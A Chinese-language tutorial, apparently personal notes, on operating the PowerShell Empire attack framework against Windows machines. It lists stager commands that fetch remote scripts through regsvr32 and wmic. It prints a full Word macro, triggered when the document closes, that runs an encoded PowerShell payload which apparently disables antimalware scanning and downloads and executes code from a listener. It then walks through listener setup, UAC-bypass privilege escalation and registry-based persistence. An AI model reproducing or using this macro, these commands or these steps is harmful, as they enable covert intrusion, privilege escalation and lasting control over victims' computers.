目录

 stager模块（payload）

宏病毒

理解

在word中的设置

宏病毒代码

运行

保存

监听模块

提权模块 

持久化模块 

---

 stager模块（payload）

常用的windows类型

windows/launcher_bat
#生成bat类型，还是可以用的。但是会报木马

windows/hta

windows/launcher_vbs

windows/dll

windows/launcher_xml
	MSBuild是一个免费的开源构建工具集，用于管理本地C++代码.在Visual Studio2013之前,MSBuild是作为.NET框架的一部分,但是在其之后,MSBuild被绑定到了Visual Studio.所以,Visual Studio依赖于MSBuild，但是MSBuild并不依赖于Visual Studio。
	cd C:\Windows\Microsoft.NET\Framework\v4.0.30319
	.\MSBuild.exe C:\users\L\Desktop\test.xml

windows/launcher_sct
	Regsvr32命令用于注册COM组件，是Windows系统提供的用来向系统注册控件或者卸载控件的命令，以命令行方式运行。WinXP及以上系统的regsvr32.exe在windows\system32文件夹下；2000系统的regsvr32.exe在winnt\system32文件夹下。
	用法:regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname
	regsvr32 /u /s /n /i:http://192.168.48.128/xx.sct scrobj.dll

windows/wmic
	WMIC扩展WMI（Windows Management Instrumentation，Windows管理工具） ，提供了从命令行接口和批命令脚本执行系统管理的支持。
	wmic os get /format:"http://192.168.48.128/test.xsl"
	常用命令：wmic share = net share #查看共享
	常用命令：wmic qfe list = systeminfo | findstr "KB" #查看补丁信息

windows/macro - 宏病毒
	1. word 选项 --> 信任中心 --> 宏设置 --> 启用所有宏
	2. 开发工具 --> 宏 --> 创建(所有活动模板和文档) --> templateProject --> microsoft word 对象 --> thisdocment --> 插入宏代码(VBA)

usestager  + 双tab #查看所有的stager 

multi # Linux

osx #mac

宏病毒

理解

宏就是为了方便使用，可以一次性使用多个按键。宏只存在与word中。

在word中的设置

1. word 选项 --> 信任中心 --> 宏设置 --> 启用所有宏

2. 开发工具 --> 宏--> 输入名字 --> 创建 -->插入宏代码(VBA)-->保存

#开了防护或者杀软就不能成功   开启防毒软件直接报毒

宏病毒代码

Sub AutoClose()
	Odd
End Sub

Public Function Odd() As Variant
	Dim gw As String
	gw = "powershell -noP -sta -w 1 -enc  SQBmACgAJABQAFMAVg"
	gw = gw + "BlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBp"
	gw = gw + "AG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAG"
	gw = gw + "UAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcA"
	gw = gw + "ZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQ"
	gw = gw + "BnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBB"
	gw = gw + "AG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAH"
	gw = gw + "QARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkA"
	gw = gw + "bABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQ"
	gw = gw + "B0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBs"
	gw = gw + "AGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAG"
	gw = gw + "kAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcA"
	gw = gw + "LgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdA"
	gw = gw + "BGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAn"
	gw = gw + "AE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlAC"
	gw = gw + "cAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEA"
	gw = gw + "cwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQ"
	gw = gw + "BzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0"
	gw = gw + "AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAE"
	gw = gw + "UAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUA"
	gw = gw + "dABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcg"
	gw = gw + "AnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBj"
	gw = gw + "ACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApAC"
	gw = gw + "wAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMA"
	gw = gw + "ZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQ"
	gw = gw + "A6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBl"
	gw = gw + "AD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAF"
	gw = gw + "MAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4A"
	gw = gw + "dAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKA"
	gw = gw + "BXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBX"
	gw = gw + "ADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAH"
	gw = gw + "YAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcA"
	gw = gw + "OwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZA"
	gw = gw + "BpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0"
	gw = gw + "AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG"
	gw = gw + "8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIA"
	gw = gw + "MABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARA"
	gw = gw + "BrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBN"
	gw = gw + "AEEAQQB1AEEARABFAEEATQBBAEEAMQBBAEQAbwBBAE8AQQBBAD"
	gw = gw + "QAQQBEAGcAQQBOAHcAQQA9ACcAKQApACkAOwAkAHQAPQAnAC8A"
	gw = gw + "bABvAGcAaQBuAC8AcAByAG8AYwBlAHMAcwAuAHAAaABwACcAOw"
	gw = gw + "AkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBz"
	gw = gw + "AGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAHcAYwAuAF"
	gw = gw + "AAcgBvAHgAeQA9AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcA"
	gw = gw + "ZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARABlAGYAYQB1AGwAdA"
	gw = gw + "BXAGUAYgBQAHIAbwB4AHkAOwAkAHcAYwAuAFAAcgBvAHgAeQAu"
	gw = gw + "AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAD0AIABbAFMAeQBzAH"
	gw = gw + "QAZQBtAC4ATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMA"
	gw = gw + "YQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AE4AZQB0AHcAbw"
	gw = gw + "ByAGsAQwByAGUAZABlAG4AdABpAGEAbABzADsAJABTAGMAcgBp"
	gw = gw + "AHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAHcAYwAuAFAAcgBvAH"
	gw = gw + "gAeQA7ACQASwA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4A"
	gw = gw + "RQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQ"
	gw = gw + "B0AEIAeQB0AGUAcwAoACcATQBoADQAVQAwACUARQB8AC0AZAA7"
	gw = gw + "AEQAWwBIAE8AeABTAFIAYgA2AD8ALgAxACkAUAA1AFQAIQBWAE"
	gw = gw + "wAbAAsACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIA"
	gw = gw + "ZwBzADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQ"
	gw = gw + "B8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABL"
	gw = gw + "AFsAJABfACUAJABLAC4AQwBvAHUAbgB0AF0AKQAlADIANQA2AD"
	gw = gw + "sAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQA"
	gw = gw + "SgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQ"
	gw = gw + "AoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAk"
	gw = gw + "AFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsAC"
	gw = gw + "QAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkA"
	gw = gw + "XQA7ACQAXwAtAGIAeABvAHIAJABTAFsAKAAkAFMAWwAkAEkAXQ"
	gw = gw + "ArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAdwBj"
	gw = gw + "AC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgBDAG8AbwBrAG"
	gw = gw + "kAZQAiACwAIgBJAEsAbABxAFcARQBrAD0AaQBMAEsAQQArAEEA"
	gw = gw + "RgB5ADYAdgByAFMAawBHAFIAUwBWAHUAWQBsAGMAOABLAGsAQw"
	gw = gw + "AwAEkAPQAiACkAOwAkAGQAYQB0AGEAPQAkAHcAYwAuAEQAbwB3"
	gw = gw + "AG4AbABvAGEAZABEAGEAdABhACgAJABzAGUAcgArACQAdAApAD"
	gw = gw + "sAJABpAHYAPQAkAGQAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQA"
	gw = gw + "YQB0AGEAPQAkAGQAYQB0AGEAWwA0AC4ALgAkAGQAYQB0AGEALg"
	gw = gw + "BsAGUAbgBnAHQAaABdADsALQBqAG8AaQBuAFsAQwBoAGEAcgBb"
	gw = gw + "AF0AXQAoACYAIAAkAFIAIAAkAGQAYQB0AGEAIAAoACQASQBWAC"
	gw = gw + "sAJABLACkAKQB8AEkARQBYAA=="
	Set asd = CreateObject("WScript.Shell")
	asd.Run(gw)
End Function

运行

当你关闭word文档的时候，就会快速弹出一个会话框，自动连接会话。

保存

在保存文档的时候要将其保存为带宏的文档，不然就是普通文档

 

监听模块

uselistenner + 双tap 
#显示全部监听模块

uselistener http 
#使用http监听模块
	
info 
#查看模块参数（show options）
	
set Name $name 
#设置监听名
	
set Port $portnumber
#设置端口号
	
execute 
#执行（run/exploit）

提权模块 

在empire中, 拥有管理员权限的带库在username前面会多一个*
	
usemodule privesc/ + 双tap 
#查询提权模块
	
(Empire: tiquan) > usemodule powershell_privesc_ask
#UAC提权模块
#运行完这个模块会在windows跳出一个跟msf提权一样的确认，这个用的是powershell，需要手动完成确认提权

usemodule powershell_privesc_bypassuac_fodhelper
#这个模块在Windows11可以绕过成功（只有这个模块成功，在没开启防护的前提下）
	
(Empire: 10) > bypassuac listen1
#默认运行 powershell/privesc/bypassuac_eventvwr
#在Windows11绕过不行
	
usemodule powershell_privesc_powerup_allchecks
#检查漏洞模块

持久化模块 

PowerBreach是一系列内存中的PowerShell后门，可为各种选项提供触发器
	
(Empire: 10) >  usemodule powershell_persistence_powerbreach_deaduser
#参数：sleep（检测时间）、Username（肉鸡用户名）、listener（监听器）
#每隔Sleep秒就会检查帐户是否仍然存在，如果不存在则触发登台逻辑。该后门不需要本地管理员权限。




(Empire: agents) > usemodule powershell_persistence_userland_registry
#设置注册表持续化模块

set Listener 666
#设置监听

set RegPath HKCU:Software\Microsoft\Windows\CurrentVersion\Run
#设置生成路径 
#生成路径 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Updater